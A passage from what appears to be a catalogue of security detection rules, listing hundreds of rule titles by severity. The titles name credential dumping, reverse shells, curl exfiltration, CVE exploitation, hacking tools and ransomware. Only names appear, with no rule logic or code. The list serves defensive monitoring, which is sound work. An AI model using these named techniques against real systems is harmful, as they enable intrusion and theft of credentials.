  • Windows Recall Feature Enabled - Registry
  • Enabling COR Profiler Environment Variables
  • Scripted Diagnostics Turn Off Check Enabled - Registry
  • Registry Modification to Hidden File Extension
  • Displaying Hidden Files Feature Disabled
  • Registry Hide Function from User
  • New Root or CA or AuthRoot Certificate to Store
  • Internet Explorer DisableFirstRunCustomize Enabled
  • Potential Persistence Via Netsh Helper DLL - Registry
  • Potential Credential Dumping Attempt Using New NetworkProvider - REG
  • Enable Microsoft Dynamic Data Exchange
  • Outlook Security Settings Updated - Registry
  • Potential Persistence Using DebugPath
  • Potential Persistence Via AppCompat RegisterAppRestart Layer
  • Potential Persistence Via Custom Protocol Handler
  • Potential Persistence Via Event Viewer Events.asp
  • Register New IFilter For Persistence
  • Potential Persistence Via Scrobj.dll COM Hijacking
  • Potential Persistence Via Visual Studio Tools for Office
  • Potential Persistence Via Shim Database Modification
  • Potential PowerShell Execution Policy Tampering
  • Suspicious Powershell In Registry Run Keys
  • ScreenSaver Registry Key Set
  • Potential SentinelOne Shell Context Menu Scan Command Tampering
  • ServiceDll Hijack
  • Registry Explorer Policy Modification
  • Persistence Via New SIP Provider
  • Activate Suppression of Windows Security Center Notifications
  • Suspicious Keyboard Layout Load
  • Potential PendingFileRenameOperations Tampering
  • Suspicious Service Installed
  • RDP Sensitive Settings Changed to Zero
  • Old TLS1.0/TLS1.1 Protocol Version Enabled
  • COM Hijacking via TreatAs
  • UAC Disabled
  • UAC Notification Disabled
  • UAC Secure Desktop Prompt Disabled
  • Enable Local Manifest Installation With Winget
  • Winlogon AllowMultipleTSSessions Enable
  • Sysmon Configuration Change
  • Sysmon File Executable Creation Detected
  • WMI Event Subscription
  • Exploit for CVE-2017-0261
  • Defrag Deactivation
  • Defrag Deactivation - Security
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
  • Potential CVE-2021-27905 Exploitation Attempt
  • Potential CVE-2021-42278 Exploitation Attempt
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
  • Zimbra Collaboration Suite Email Server Unauthenticated RCE
  • CVE-2022-31659 VMware Workspace ONE Access RCE
  • Suspicious Set Value of MSDT in Registry (CVE-2022-30190)
  • CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy)
  • CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver)
  • Potential CVE-2023-2283 Exploitation
  • Potential CVE-2023-23397 Exploitation Attempt - SMB
  • Potential CVE-2023-27997 Exploitation Indicators
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
  • Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location
  • Potential CVE-2023-36884 Exploitation Dropped File
  • Potential CVE-2023-36884 Exploitation - File Downloads
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
  • Potential CVE-2023-46214 Exploitation Attempt
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Proxy
  • CVE-2023-4966 Potential Exploitation Attempt - Citrix ADC Sensitive Information Disclosure - Webserver
  • DarkGate - Autoit3.EXE File Creation By Uncommon Process
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE
  • Potential Encrypted Registry Blob Related To SNAKE Malware
  • DLL Names Used By SVR For GraphicalProton Backdoor
  • Okta 2023 Breach Indicator Of Compromise
  • Potential Peach Sandstorm APT C2 Communication Activity
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation
  • ScreenConnect User Database Modification
  • ScreenConnect User Database Modification - Security
  • Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation
  • DarkGate - Drop DarkGate Loader In C:\Temp Directory
  • Potential KamiKakaBot Activity - Lure Document Execution
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
  • Kapeka Backdoor Configuration Persistence
  • Potential APT FIN7 Exploitation Activity
  • Forest Blizzard APT - JavaScript Constrained File Creation
  • Account Created And Deleted By Non Approved Users
  • Potential Pass the Hash Activity
  • Remote Registry Management Using Reg Utility
  • Interactive Logon to Server Systems
  • Mail Forwarding/Redirecting Activity In O365
  • Python Path Configuration File Creation - Linux
  • Terminate Linux Process Via Kill
  • Python Path Configuration File Creation - MacOS
  • Clipboard Data Collection Via Pbpaste
  • .Class Extension URI Ending Request
  • Potential Remote WMI ActiveScriptEventConsumers Activity
  • CreateRemoteThread API and LoadLibrary
  • Remote Thread Creation Via PowerShell
  • Access To Sysvol Policies Share By Uncommon Process
  • Python Path Configuration File Creation - Windows
  • VsCode Code Tunnel Execution File Indicator
  • WebDAV Temporary Local File Creation
  • Non-DLL Extension File Renamed With DLL Extension
  • Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process
  • Dfsvc.EXE Network Connection To Non-Local IPs
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address
  • HH.EXE Initiated HTTP Network Connection
  • Potentially Suspicious Azure Front Door Connection
  • Network Connection Initiated From Users\Public Folder
  • Uncommon PowerShell Hosts
  • Windows Mail App Mailbox Access Via PowerShell Script
  • SMB over QUIC Via PowerShell Script
  • Potential Registry Reconnaissance Via PowerShell Script
  • Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet
  • WinAPI Library Calls Via PowerShell Scripts
  • WinAPI Function Calls Via PowerShell Scripts
  • Potential Credential Dumping Attempt Via PowerShell
  • LSASS Access From Program In Potentially Suspicious Folder
  • Uncommon GrantedAccess Flags On LSASS
  • Potential Shellcode Injection
  • Headless Process Launched Via Conhost.EXE
  • Dynamic .NET Compilation Via Csc.EXE - Hunting
  • File Download Via Curl.EXE
  • Potential Data Exfiltration Via Curl.EXE
  • Diskshadow Child Process Spawned
  • Curl.EXE Execution With Custom UserAgent
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process
  • Diskshadow Script Mode Execution
  • Potential DLL Sideloading Activity Via ExtExport.EXE
  • Potential Password Reconnaissance Via Findstr.EXE
  • New Self Extracting Package Created Via IExpress.EXE
  • Microsoft Workflow Compiler Execution
  • SMB over QUIC Via Net.EXE
  • Suspicious New Instance Of An Office COM Object
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Potentially Suspicious PowerShell Child Processes
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
  • Remote Access Tool - Ammy Admin Agent Execution
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
  • DLL Call by Ordinal Via Rundll32.EXE
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
  • Scheduled Task Creation From Potential Suspicious Parent Location
  • Potential CommandLine Obfuscation Using Unicode Characters
  • Potentially Suspicious Compression Tool Parameters
  • Elevated System Shell Spawned
  • EventLog Query Requests By Builtin Utilities
  • Execution From Webserver Root Folder
  • Tunneling Tool Execution
  • File or Folder Permissions Modifications
  • Manual Execution of Script Inside of a Compressed File
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
  • Arbitrary Command Execution Using WSL
  • Cab File Extraction Via Wusa.EXE
  • Microsoft Office Trusted Location Updated
  • Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace
  • Service Binary in User Controlled Folder
  • AWS EC2 Download Userdata
  • Potential Backup Enumeration on AWS
  • Potential Storage Enumeration on AWS
  • AWS Macie Evasion
  • Potential AWS Cloud Email Service Abuse
  • Use of Debugfs to Access a Raw Disk
  • Failed Logins with Different Accounts from Single Source - Linux
  • Privilege Escalation Preparation
  • High DNS Bytes Out
  • High NULL Records Requests Rate
  • High DNS Requests Rate
  • High TXT Records Requests Rate
  • High DNS Bytes Out - Firewall
  • High DNS Requests Rate - Firewall
  • Network Scans Count By Destination IP
  • Possible DNS Rebinding
  • Network Scans Count By Destination Port
  • Multiple Modsecurity Blocks
  • Multiple Suspicious Resp Codes Caused by Single Client
  • Possible DNS Rebinding
  • Invoke-Obfuscation COMPRESS OBFUSCATION
  • Invoke-Obfuscation RUNDLL LAUNCHER
  • Tap Driver Installation
  • Mimikatz In-Memory
  • Automated Turla Group Lateral Movement
  • Reconnaissance Activity Using BuiltIn Commands
  • Files Dropped to Program Files by Non-Privileged Process
  • Dumping ntds.dit remotely via DCSync
  • Dumping ntds.dit remotely via NetSync
  • Remote Schtasks Creation
  • Enumeration via the Global Catalog
  • Password Spraying via Explicit Credentials
  • Multiple Users Failing to Authenticate from Single Process
  • Failed Logins with Different Accounts from Single Source System
  • Failed NTLM Logins with Different Accounts from Single Source System
  • Valid Users Failing to Authenticate From Single Source Using Kerberos
  • Disabled Users Failing To Authenticate From Source Using Kerberos
  • Invalid Users Failing To Authenticate From Source Using Kerberos
  • Valid Users Failing to Authenticate from Single Source Using NTLM
  • Invalid Users Failing To Authenticate From Single Source Using NTLM
  • Multiple Users Remotely Failing To Authenticate From Single Source
  • Suspicious Multiple File Rename Or Delete Occurred
  • Possible Remote Password Change Through SAMR
  • Suspicious Werfault.exe Network Connection Outbound
  • Failed Mounting of Hidden Share
  • Domain User Enumeration Network Recon 01
  • Potential Exfiltration of Compressed Files
low 334
Show Rules (334)
  • Vulnerable Driver Load By Name
  • Alternate PowerShell Hosts - Image
  • Powershell File and Directory Discovery
  • Suspicious Get-WmiObject
  • Suspicious In-Memory Module Execution
  • Indirect Command Execution
  • New Service Creation
  • Possible Applocker Bypass
  • Stop Windows Service
  • Process Start From Suspicious Folder
  • PsExec Tool Execution
  • PsExec Service Start
  • Lateral Movement Indicator ConDrv
  • Group Modification Logging
  • Deployment Deleted From Kubernetes Cluster
  • Container With A hostPath Mount Created
  • Privileged Container Deployed
  • RBAC Permission Enumeration Attempt
  • Kubernetes Secrets Enumeration
  • New Kubernetes Service Account Created
  • Kubernetes Unauthorized or Unauthenticated Access
  • New Network ACL Entry Added
  • AWS EC2 VM Export Failure
  • AWS EKS Cluster Created or Deleted
  • AWS ElastiCache Security Group Created
  • AWS ElastiCache Security Group Modified or Deleted
  • Potential Bucket Enumeration on AWS
  • AWS Glue Development Endpoint Activity
  • AWS Route 53 Domain Transfer Lock Disabled
  • AWS Route 53 Domain Transferred to Another Account
  • AWS S3 Data Management Tampering
  • AWS STS AssumeRole Misuse
  • AWS STS GetSessionToken Misuse
  • Azure Container Registry Created or Deleted
  • Azure Kubernetes Cluster Created or Deleted
  • End User Consent
  • Measurable Increase Of Successful Authentications
  • Failed Authentications From Countries You Do Not Operate Out Of
  • Azure AD Only Single Factor Authentication Required
  • Sign-ins by Unknown Devices
  • Bitbucket Project Secret Scanning Allowlist Added
  • Bitbucket Secret Scanning Rule Deleted
  • Google Cloud Storage Buckets Enumeration
  • Github New Secret Created
  • Github Push Protection Bypass Detected
  • Github Self Hosted Runner Changes Detected
  • Suspicious Inbox Forwarding
  • Okta Policy Modified or Deleted
  • OneLogin User Assumed Another User
  • OneLogin User Account Locked
  • Host Without Firewall
  • Cleartext Protocol Usage Via Netflow
  • Audio Capture
  • Linux Capabilities Discovery
  • Clipboard Collection with Xclip Tool - Auditd
  • Clipboard Collection of Image Data with Xclip Tool
  • Data Compressed
  • Overwriting the File with Dev Zero or Null
  • File or Folder Permissions Change
  • Use Of Hidden Paths Or Files
  • Hidden Files and Directories
  • Steganography Hide Zip Information in Picture File
  • Linux Network Service Scanning - Auditd
  • Network Sniffing - Linux
  • Password Policy Discovery - Linux
  • Systemd Service Reload or Start
  • Screen Capture with Import Tool
  • Screen Capture with Xwd
  • Split A File Into Pieces - Linux
  • Steganography Hide Files with Steghide
  • Steganography Extract Files with Steghide
  • System Information Discovery - Auditd
  • Steganography Unzip Hidden Information From Picture File
  • System Owner or User Discovery - Linux
  • Remote File Copy
  • Space After Filename
  • Potentially Suspicious Shell Script Creation in Profile Folder
  • Scheduled Task/Job At
  • Decode Base64 Encoded Text
  • Bash Interactive Shell
  • Capabilities Discovery - Linux
  • Clipboard Collection with Xclip Tool
  • Crontab Enumeration
  • Curl Usage on Linux
  • DD File Overwrite
  • Linux Doas Tool Execution
  • OS Architecture Discovery Via Grep
  • Install Root Certificate
  • Local System Accounts Discovery - Linux
  • Local Groups Discovery - Linux
  • Named Pipe Created Via Mkfifo
  • Connection Proxy
  • Remote Access Tool - Team Viewer Session Started On Linux Host
  • Linux Remote System Discovery
  • Linux Package Uninstall
  • Security Software Discovery - Linux
  • Setuid and Setgid
  • Container Residence Discovery Via Proc Virtual FS
  • Docker Container Discovery Via Dockerenv Listing
  • Potential Container Discovery Via Inodes Listing
  • Linux Network Service Scanning Tools Execution
  • System Network Connections Discovery - Linux
  • Startup Item File Created - MacOS
  • Decode Base64 Encoded Text -MacOs
  • Creation Of A Local User Account
  • System Integrity Protection (SIP) Enumeration
  • GUI Input Capture - macOS
  • JAMF MDM Execution
  • Local System Accounts Discovery - MacOs
  • MacOS Network Service Scanning
  • Remote Access Tool - Team Viewer Session Started On MacOS Host
  • Screen Capture - macOS
  • Space After Filename - macOS
  • Split A File Into Pieces
  • Guest Account Enabled Via Sysadminctl
  • Gatekeeper Bypass via Xattr
  • Cisco Collect Data
  • Cisco Discovery
  • Cisco Stage Data
  • Cisco BGP Authentication Failures
  • Cisco LDP Authentication Failures
  • Cleartext Protocol Usage
  • Huawei BGP Authentication Failures
  • Juniper BGP Missing MD5
  • DNS Events Related To Mining Pools
  • New Kind of Network (NKN) Detection
  • WebDav Put Request
  • Download From Suspicious TLD - Blacklist
  • Download From Suspicious TLD - Whitelist
  • Suspicious Network Communication With IPFS
  • Application Uninstalled
  • MSSQL Server Failed Logon
  • Remote Access Tool - ScreenConnect Command Execution
  • Remote Access Tool - ScreenConnect File Transfer
  • Sysinternals Tools AppX Versions Execution
  • New BITS Job Created Via Bitsadmin
  • New BITS Job Created Via PowerShell
  • CodeIntegrity - Unmet Signing Level Requirements By File Under Validation
  • DNS Query To Ufile.io - DNS Client
  • USB Device Plugged
  • The Windows Defender Firewall Service Failed To Load Group Policy
  • Windows Defender Firewall Has Been Reset To Its Default Configuration
  • Windows Firewall Settings Have Been Changed
  • Previously Installed IIS Module Was Removed
  • NTLM Logon
  • ADCS Certificate Template Configuration Vulnerability
  • Add or Remove Computer from DC
  • Access To ADMIN$ Network Share
  • Windows Event Auditing Disabled
  • External Disk Drive Or USB Storage Device Was Recognized By The System
  • Service Registry Key Read Access Request
  • Unauthorized System Time Modification
  • Tap Driver Installation - Security
  • Local User Creation
  • Admin User Remote Logon
  • A Member Was Removed From a Security-Enabled Global Group
  • A Member Was Added to a Security-Enabled Global Group
  • A Security-Enabled Global Group Was Deleted
  • Outgoing Logon with New Credentials
  • Successful Account Login Via WMI
  • Active Directory Certificate Services Denied Certificate Enrollment Request
  • No Suitable Encryption Key Found For Generating Kerberos Ticket
  • Volume Shadow Copy Mount
  • Suspicious Usage of CVE_2021_34484 or CVE 2022_21919
  • Windows Service Terminated With Error
  • Windows Defender Submit Sample Feature Disabled
  • DNS Server Discovery Via LDAP Query
  • DNS Query Request By QuickAssist.EXE
  • DNS Query Request To OneLaunch Update Service
  • DNS Query To Ufile.io
  • Vulnerable Driver Load By Name
  • TeamViewer Log File Deleted
  • Dynamic CSharp Compile Artefact
  • NTDS.DIT Created
  • Office Macro File Creation
  • PowerShell Script Dropped Via PowerShell.EXE
  • PowerShell Module File Created
  • Remote Access Tool - ScreenConnect Temporary File
  • PsExec Service File Creation
  • Potential Azure Browser SSO Abuse
  • Load Of RstrtMgr.DLL By An Uncommon Process
  • Potential 7za.DLL Sideloading
  • Network Connection Initiated To Mega.nz
  • Potentially Suspicious Network Connection To Notion API
  • Remote PowerShell Session (PS Classic)
  • Renamed Powershell Under Powershell Channel
  • Use Get-NetTCPConnection
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule
  • Use Get-NetTCPConnection - PowerShell Module
  • Suspicious Get Local Groups Information
  • Suspicious Get Information for SMB Share - PowerShell Module
  • Active Directory Computers Enumeration With Get-AdComputer
  • Active Directory Group Enumeration With Get-AdGroup
  • Automated Collection Bookmarks Using Get-ChildItem PowerShell
  • PowerShell Script With File Upload Capabilities
  • PowerShell Script Change Permission Via Set-Acl - PsScript
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock
  • Potential PowerShell Obfuscation Using Character Join
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy
  • Suspicious PowerShell Get Current User
  • Suspicious GPO Discovery With Get-GPO
  • Suspicious Process Discovery With Get-Process
  • Suspicious Get Local Groups Information - PowerShell
  • Suspicious Mount-DiskImage
  • Suspicious Connection to Remote Account
  • Suspicious Get Information for SMB Share
  • Potential PowerShell Obfuscation Using Alias Cmdlets
  • Suspicious SSL Connection
  • Powershell Suspicious Win32_PnPEntity
  • Replace Desktop Wallpaper by Powershell
  • Uncommon Process Access Rights For Target Image
  • BitLockerTogo.EXE Execution
  • Data Copied To Clipboard Via Clip.EXE
  • Change Default File Association Via Assoc
  • File Deletion Via Del
  • File And SubFolder Enumeration Via Dir Command
  • Directory Removal Via Rmdir
  • DirLister Execution
  • Insensitive Subfolder Search Via Findstr.EXE
  • Fsutil Drive Enumeration
  • HH.EXE Execution
  • Suspicious Execution of Hostname
  • JScript Compiler Execution
  • Indirect Command Execution By Program Compatibility Wizard
  • Mstsc.EXE Execution With Local RDP File
  • Firewall Configuration Discovery Via Netsh.EXE
  • Unmount Share Via Net.EXE
  • Start Windows Service Via Net.EXE
  • Stop Windows Service Via Net.EXE
  • Windows Share Mount Via Net.EXE
  • System Network Connections Discovery Via Net.EXE
  • Share And Session Enumeration Using Net.EXE
  • Nltest.EXE Execution
  • New Service Creation Using PowerShell
  • Potential Encoded PowerShell Patterns In CommandLine
  • Non Interactive PowerShell Process Spawned
  • Stop Windows Service Via PowerShell Stop-Service
  • PUA - Adidnsdump Execution
  • QuickAssist Execution
  • Files Added To An Archive Using Rar.EXE
  • Exports Registry Key To a File
  • Registry Modification Via Regini.EXE
  • Suspicious Query of MachineGUID
  • Remote Access Tool - ScreenConnect Remote Command Execution
  • Remote Access Tool - Team Viewer Session Started On Windows Host
  • Discovery of a System Time
  • Run Once Task Execution as Configured in Registry
  • Scheduled Task Creation Via Schtasks.EXE
  • New Service Creation Using Sc.EXE
  • Interesting Service Enumeration Via Sc.EXE
  • Stop Windows Service Via Sc.EXE
  • Local Accounts Discovery
  • Suspicious Network Command
  • Windows Processes Suspicious Parent Directory
  • Malicious Windows Script Components File Execution by TAEF Detection
  • Potential Execution of Sysinternals Tools
  • Suspicious Execution of Systeminfo
  • Compressed File Creation Via Tar.EXE
  • Compressed File Extraction Via Tar.EXE
  • New Process Created Via Taskmgr.EXE
  • Detect Virtualbox Driver Installation OR Starting Of VMs
  • Suspicious Where Execution
  • Whoami Utility Execution
  • Local Groups Reconnaissance Via Wmic.EXE
  • Potential Defense Evasion Via Raw Disk Access By Uncommon Tools
  • PUA - Sysinternal Tool Execution - Registry
  • New ODBC Driver Registered
  • MaxMpxCt Registry Value Changed
  • Modification of IE Registry Settings
  • PowerShell Script Execution Policy Enabled
  • ETW Logging Disabled For rpcrt4.dll
  • ETW Logging Disabled For SCM
  • Winget Admin Settings Modification
  • Outlook Task/Note Reminder Received
  • CVE-2023-40477 Potential Exploitation - .REV File Creation
  • SNAKE Malware Installer Name Indicators
  • Potential Raspberry Robin Registry Set Internet Settings ZoneMap
  • Authentication Occuring Outside Normal Business Hours
  • User with Privileges Logon
  • DNS Request From Windows Script Host
  • Userdomain Variable Enumeration
  • Okta Password Health Report Query
  • Process Discovery
  • Firewall Rule Modified In The Windows Firewall Exception List
  • Access To Browser Credential Files By Uncommon Applications - Security
  • Scheduled Task Deletion
  • Access To Browser Credential Files By Uncommon Applications
  • Access To Chromium Browsers Sensitive Files By Uncommon Applications
  • Access To Windows Outlook Mail Files By Uncommon Applications
  • Access To .Reg/.Hive Files By Uncommon Applications
  • Unattend.XML File Access Attempt
  • ADS Zone.Identifier Deleted
  • DMP/HDMP File Creation
  • Scheduled Task Created - FileCreation
  • Creation of an Executable by an Executable
  • Amsi.DLL Load By Uncommon Process
  • System Drawing DLL Load
  • Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
  • Microsoft Excel Add-In Loaded
  • Microsoft Word Add-In Loaded
  • WMI Module Loaded By Uncommon Process
  • Msiexec.EXE Initiated Network Connection Over HTTP
  • Network Connection Initiated By PowerShell Process
  • PsExec Default Named Pipe
  • bXOR Operator Usage In PowerShell Command Line - PowerShell Classic
  • Local Firewall Rules Enumeration Via NetFirewallRule Cmdlet
  • Compress-Archive Cmdlet Execution
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet - ScriptBlock
  • Use Of Remove-Item to Delete File - ScriptBlock
  • Password Protected Compressed File Extraction Via 7Zip
  • Set Files as System Files Using Attrib.EXE
  • CMD Shell Output Redirect
  • Potential File Override/Append Via SET Command
  • Curl.EXE Execution
  • Potential Proxy Execution Via Explorer.EXE From Shell Process
  • CodePage Modification Via MODE.COM
  • Net.EXE Execution
  • Import New Module Via PowerShell CommandLine
  • Unusually Long PowerShell CommandLine
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
  • SC.EXE Query Execution
  • Potential Suspicious Execution From GUID Like Folder Names
  • Process Terminated Via Taskkill
  • System Information Discovery Via Wmic.EXE
  • Scheduled Task Created - Registry
  • Command Executed Via Run Dialog Box - Registry
  • Shell Context Menu Command Tampering
  • Account Enumeration on AWS
  • Potential Network Enumeration on AWS
  • AWS Lambda Function Created or Invoked
  • Quick Execution of a Series of Suspicious Commands
  • Rare Schtasks Creations
  • Rare Service Installations
  • Rare Scheduled Task Creations
critical: 186 rules
  • CobaltStrike Malformed UAs in Malleable Profiles
  • iOS Implant URL Pattern
  • Credential Dumping Tools Service Execution
  • Mimikatz MemSSP Default Log File Creation
  • Dnscat Execution
  • Credential Dumping by LaZagne
  • Credential Dumping by Pypykatz
  • CrackMapExecWin
  • Lazarus Loaders
  • DNS Tunnel Technique from MuddyWater
  • TA505 Dropper Load Pattern
  • Ryuk Ransomware Command Line Activity
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon
  • Antivirus Exploitation Framework Detection
  • Antivirus Password Dumper Detection
  • Antivirus Ransomware Detection
  • Bitbucket Unauthorized Access To A Resource
  • Bitbucket Unauthorized Full Data Export Triggered
  • Possible Coin Miner CPU Priority Param
  • Webshell Remote Command Execution
  • Sudo Privilege Escalation CVE-2019-14287 - Builtin
  • Linux Reverse Shell Indicator
  • Cobalt Strike DNS Beaconing
  • HackTool - BabyShark Agent Default URL Pattern
  • PwnDrp Access
  • Audit CVE Event
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client
  • ProxyLogon MSExchange OabVirtualDirectory
  • Mailbox Export to Exchange Webserver
  • Certificate Request Export to Exchange Webserver
  • AD Object WriteDAC Access
  • Active Directory Replication from Non Machine Account
  • WCE wceaux.dll Access
  • Win Susp Computer Name Containing Samtheadmin
  • DiagTrackEoP Default Login Username
  • Zerologon Exploitation Using Well-known Tools
  • CobaltStrike Service Installations - System
  • Moriya Rootkit - System
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon
  • Potential DCOM InternetExplorer.Application DLL Hijack
  • HackTool - Dumpert Process Dumper Default File
  • HackTool - Inveigh Execution Artefacts
  • HackTool - Mimikatz Kirbi File Creation
  • HackTool - QuarksPwDump Dump File
  • Wmiexec Default Output File
  • Wmiprvse Wbemcomn DLL Hijack - File
  • Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
  • CobaltStrike Named Pipe
  • CobaltStrike Named Pipe Pattern Regex
  • HackTool - DiagTrackEoP Default Named Pipe
  • HackTool - Koh Default Named Pipe
  • HackTool - Credential Dumping Tools Named Pipe Created
  • Malicious Named Pipe Created
  • Bad Opsec Powershell Code Artifacts
  • Silence.EDA Detection
  • Suspicious PowerShell Mailbox Export to Share - PS
  • Persistence Via Sticky Key Backdoor
  • Sticky Key Like Backdoor Execution
  • HackTool - F-Secure C3 Load by Rundll32
  • HackTool - DInjector PowerShell Cradle Execution
  • HackTool - Dumpert Process Dumper Execution
  • HackTool - Empire PowerShell UAC Bypass
  • Hacktool Execution - Imphash
  • HackTool - Inveigh Execution
  • HackTool - PurpleSharp Execution
  • Potential SMB Relay Attack Tool Execution
  • HackTool - Rubeus Execution
  • HackTool - SafetyKatz Execution
  • HackTool - SecurityXploded Execution
  • HackTool - SharpUp PrivEsc Tool Execution
  • HackTool - Sliver C2 Implant Activity Pattern
  • HackTool - SysmonEOP Execution
  • HackTool - Windows Credential Editor (WCE) Execution
  • Potential Credential Dumping Via LSASS Process Clone
  • Suspicious Child Process Of Veeam Dabatase
  • Suspicious PowerShell Mailbox Export to Share
  • Renamed Whoami Execution
  • Suspicious Double Extension File Execution
  • DumpStack.log Defender Evasion
  • TrustedPath UAC Bypass Pattern
  • WMI Backdoor Exchange Transport Agent
  • Pandemic Registry Key
  • Windows Credential Editor Registry
  • Registry Entries For Azorult Malware
  • PrinterNightmare Mimikatz Driver Name
  • Potential Credential Dumping Via LSASS SilentProcessExit Technique
  • Sticky Key Like Backdoor Usage - Registry
  • CVE-2010-5278 Exploitation Attempt
  • ZxShell Malware
  • Turla Group Lateral Movement
  • Turla Group Commands May 2020
  • Exploit for CVE-2015-1641
  • Droppers Exploiting CVE-2017-11882
  • Exploit for CVE-2017-8759
  • CosmicDuke Service Installation
  • NotPetya Ransomware Activity
  • WannaCry Ransomware Activity
  • Turla Group Named Pipes
  • Turla PNG Dropper Service
  • Fortinet CVE-2018-13379 Exploitation
  • Oracle WebLogic Exploit
  • Elise Backdoor Activity
  • APT27 - Emissary Panda Activity
  • APT29 2018 Phishing Campaign File Indicators
  • APT29 2018 Phishing Campaign CommandLine Indicators
  • OceanLotus Registry Activity
  • OilRig APT Activity
  • OilRig APT Registry Persistence
  • OilRig APT Schedule Task Persistence - Security
  • OilRig APT Schedule Task Persistence - System
  • Pulse Secure Attack CVE-2019-11510
  • Citrix Netscaler Attack CVE-2019-19781
  • Exploiting CVE-2019-1388
  • Confluence Exploitation CVE-2019-3398
  • Potential Dridex Activity
  • Potential Dtrack RAT Activity
  • LockerGoga Ransomware Activity
  • Potential QBot Activity
  • Ursnif Malware C2 URL Pattern
  • APT31 Judgement Panda Activity
  • Potential Russian APT Credential Theft Activity
  • Equation Group DLL_U Export Function Load
  • CVE-2020-0688 Exchange Exploitation via Web Log
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass
  • DNS RCE CVE-2020-1350
  • Potential Emotet Rundll32 Execution
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt
  • Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195
  • Potential Maze Ransomware Activity
  • EvilNum APT Golden Chickens Deployment Via OCX Files
  • FlowCloud Registry Markers
  • Lazarus Group Activity
  • Leviathan Registry Key Activity
  • Solarwinds SUPERNOVA Webshell Access
  • Greenbug Espionage Group Indicators
  • UNC2452 PowerShell Pattern
  • Winnti Malware HK University Campaign
  • Winnti Pipemon Characteristics
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
  • CVE-2021-31979 CVE-2021-33771 Exploits
  • Arcadyan Router Exploitations
  • Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern
  • CVE-2021-1675 Print Spooler Exploitation
  • CVE-2021-1675 Print Spooler Exploitation IPC Access
  • Oracle WebLogic Exploit CVE-2021-2109
  • Fortinet CVE-2021-22123 Exploitation
  • ProxyLogon Reset Virtual Directories Based On IIS Log
  • Exchange Exploitation CVE-2021-28480
  • CVE-2021-33766 Exchange ProxyToken Exploitation
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit
  • InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
  • Potential CVE-2021-41379 Exploitation Attempt
  • Grafana Path Traversal Exploitation CVE-2021-43798
  • Successful Exchange ProxyShell Attack
  • Potential SystemNightmare Exploitation Attempt
  • Potential Conti Ransomware Activity
  • DarkSide Ransomware Pattern
  • FoggyWeb Backdoor DLL Loading
  • Goofy Guineapig Backdoor Service Creation
  • Moriya Rootkit File Created
  • Small Sieve Malware Potential C2 Communication
  • HAFNIUM Exchange Exploitation Activity
  • REvil Kaseya Incident Malware Patterns
  • OWASSRF Exploitation Attempt Using Public POC - Proxy
  • OWASSRF Exploitation Attempt Using Public POC - Webserver
  • CVE-2023-23397 Exploitation Attempt
  • Potential CVE-2023-36884 Exploitation Pattern
  • COLDSTEEL RAT Cleanup Command Execution
  • COLDSTEEL RAT Service Persistence Execution
  • Griffon Malware Attack Pattern
  • Qakbot Rundll32 Exports Execution
  • Qakbot Rundll32 Fake DLL Extension Execution
  • Rorschach Ransomware Execution Activity
  • SNAKE Malware Kernel Driver File Indicator
  • SNAKE Malware Service Persistence
  • Malicious DLL Load By Compromised 3CXDesktopApp
  • Diamond Sleet APT Scheduled Task Creation
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution
  • Mint Sandstorm - ManageEngine Suspicious Process Execution
  • UNC4841 - Potential SEASPY Execution
  • CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security
  • CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation
  • Meterpreter or Cobalt Strike Getsystem Service Installation
  • Malicious Service Installations
informational: 30 rules
  • Suspicious Load of Advapi31.dll
  • Windows Management Instrumentation DLL Loaded Via Microsoft Word
